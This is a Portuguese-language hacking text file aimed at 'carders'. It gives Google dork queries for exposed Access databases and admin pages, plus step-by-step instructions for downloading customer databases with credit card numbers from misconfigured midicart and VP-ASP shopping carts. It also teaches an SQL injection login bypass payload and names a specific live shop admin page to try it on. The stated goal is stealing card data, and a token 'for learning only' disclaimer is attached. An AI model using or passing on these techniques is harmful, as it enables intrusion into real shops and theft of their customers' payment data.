Googles

nunca encontrei um artigo que explicasse como eh possivel transformar o google.com em uma poderosa
ferramenta hacking.
Por este motivo decidi escrever um artigo basico sobre isto.

"allinurl:usuarios.mdb site:.com.br" busca por arquivos de banco de dados nomeados "usuarios.mdb"

dentro do dominio mae
".com.br"

"allintitle:admin panel site:.org" busca por supostas paginas de administracao dentro do dominio
".org"

"allinurl:login.asp"
lista todas as paginas com nome de "login.asp", e em alguns casos o google exibira uma versao "cache"
da pagina onde sera
possivel ver o codigo asp.

=======================
===Carder - midicart===
=======================
-----------------------------------------------------------------
Esses tutorias de Carder que irei publicar serão nem simples.
Eu colocarei os arquivos bugados a serem procurados e como pegar
as MDBs(os arquivos que contem os Ccs).
-----------------------------------------------------------------
-> Procurando sites bugados

O modo mais simples certamente é o Google(www.google.com) mas se

você sabe bem de alguma linguagem de programação recomendo que faça
seus próprios scans ;)
Para achar sites bugados com essa falha v´no Google e digite:
allinurl: meny2.asp
-----------------------------------------------------------------
-> Pegando as MDBs

Para pegar as MDBs você deverá substituir os URLs encontrador como

no exemplo abaixo:
Achamos o www.sitebug.com.br que tem o arquivo meny2.asp
Colocamos no navegador
www.sitebug.com.br/midicart.mdb
-----------------------------------------------------------------
Ps. Nunca se esquece que os MDBs podem variar de diretorio ;)
Esse txt é para aprendizado não me responsabilizo pelo que você
vier a fazer.

>>>>Vp-asp:

Vp-asp é uma técnica que explora a ma configuração do programa VP-

ASP Shopping Cart, usado por várias empresas que
utilizam o sistema de comércio eletrônico. É explorada pelo browser , e
basta você saber o nome do db e coloca-lo em seu
browser, a partir daí faz o download do db.

1º passo: Vá até o google, ou use um programa de filtragem de

url's e coloque para procurar pela seguinte palavra-
chave: "allinurl:shopdisplaycategories.asp" (sem as aspas)

Vão aparecer url's mais ou menos assim:

www.porcaria.com/shop/shopdisplaycategories.asp
 2º passo: Pegue o nome de uma das url's encontradas e coloque em
seu browser, então substitua a parte
"shopdisplaycategories.asp" por "shopdbtest.asp" para que a url fique
assim:

www.porcaria.com/shop/shopdbtest.asp

A partir daí, vai aparecer uma tabela com vários nomes como:

xDatabase = Nome do banco de dados.

xDblocation = Localização do banco de dados.
xdatabasetype = Tipo do banco de dados, se nada estiver escrito
quer dizer que é do Access, ou seja, *.mdb
xssl = Se estiver algo escrito, significa que o db(banco de dados)
está nessa url.

Mas e como faço para pegar o banco de dados?

3º passo: Veja o que está escrito em "xDatabase", este será o nome

do db, normalmente é algo parecido com
"shopping.mdb" ou "shopping450.mdb".
Agora você ve o que está escrito no "xDblocation", porque esse é o
diretório onde está localizado o db, e agora?

4º passo: Coloque na url, o diretório que está o db, seguido do

nome do db. Ficaria mais ou menos assim:

www.porcaria.com/shop/fpdb/shopping.mdb

Pronto, você vai estar baixando o db. Claro que este texto está um
pouco resumido, mas em breve estarei
disponibilizando um texto sobre vp-asp que ensina muito bem explicado.

>>>>SQL Injection:

Não vou entrar na parte teórica da coisa, vou só explicar como

usar e não o porque que acontecem as coisas, se você
quer aprender isto procure gugliar um pouco e aprenda por si mesmo.
Esta técnicas se baseia na injeção de comandos para o banco de
dados SQL em conjunto com ASP ou PHP. O que você
precisa saber por agora é simplesmente o que escrever.
Nas mesmas urls que você fez a busca no tópico anterior sobre vp-
asp, você vai encontrar na página um link, na parte
inferior, "Shop Administration" ou coisa parecida com Administrador.
Você tem que clicar no link e ele vai pedir o login e a senha.
Você simplesmente vai responder os campos assim:

login: ' or '1

senha: ' or '1

Isso mesmo, aspa + espaço + or + espaço + aspa + 1.

Tem vezes que não precisa colocar senha. Após isso você vai ter
acesso como administrador dentro do site e poderá
ver os pedidos das pessoas, tenha sorte para encontrar um site co
bastante pedidos e bastante CCs. :)
 Teste neste site: www.petipanema.com.br/shopadmin.asp

Qualquer dúvida há um texto explicando a técnicas mais

teóricamente e tudo mais em www.totalsecurity.com.br

>>>>WebDav:

Ainda não tive tempo de ler muito sobre essta falha, mas sei sobre
um tutorial que um amigo ae fez, bem completo,
com imagens, e bem explicado. Gostaria que desculpassem por não explicar
aqui tudo direitinho, mas, a coisa aqui ta dificil.

www.ownedyou.org - feito por den1ed

>>>>Comersus:

É uma boa falha, parecida com o Vp-asp, so que em outro programa

de shopping-cart, pelo motivo do poerschke ter
escrito um texto nesta semana eu já me poupo de escrever tudo aqui e
passo diretamente a url.

www.portalath.com/Poerschke

salescart generated web site

/fpdb/shop.mdb